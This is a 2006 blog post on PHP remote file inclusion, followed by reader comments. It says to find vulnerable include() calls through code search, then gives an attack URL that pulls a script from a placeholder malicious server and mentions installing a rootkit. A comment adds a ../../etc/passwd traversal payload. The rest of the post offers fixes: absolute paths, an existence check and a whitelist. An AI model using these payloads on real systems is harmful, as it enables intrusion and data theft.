By Romain Friday, October 27 2006 - 23:30 UTC - Vulnerabilities - Permalink
Here we go.
You can do whatever you want once you have this access: installing a rootkit, looking at the db etc.
Follow the next instructions...
Thanks to google code search, you can look for a basic php include with a get/post value. Mine the results until you find something interesting...
Basically, what you've found is:
<? .. include( $_GET['myFile'] ); ?>
Just give the script what he wants: http://.../blah.php?myFile=http://bad.server.com/myScriptPHP.txt
The most easy for you is to add absolute path, such as:
<? .. include( '/home/foo/www/docs/' . $_GET['myFile'] ); ?>
Then, to be sure that the file is okay, you only have to allow in-domain file opening, then:
<? ..
$myFile = '/home/foo/www/docs/' . $_GET['myFile'];
if (!file_exists($myFile))
$myFile = '/home/foo/www/error/404.html';
include( $myFile );
?>
Another way to do that is the next:
<? ..
$myFile = htmlentities($_GET['myFile']);
switch($myFile){
case 'menu':
case 'blog':
case 'cv':
break;
default: $myFile = 'error'; break;
}
include( $myFile );
?>
Comments
1st way is still exploitable in a way.
instead of:
www.mywebsite.com/index.php?page=myfile.html
if i type:
www.mywebsite.com/index.php?page=../../../../etc/passwd
i will retrieve your passwd file or any other file i can think of.
read the following blog post for details:
www.0x000000.com/index.php?i=315
----------------
better use the second way,
cheers
Wahou, I didn't even remember this post. Anyway, you're absolutely right; a solution is to prevetn path traversal for instance and also special characters inection such as NULL bytes, etc.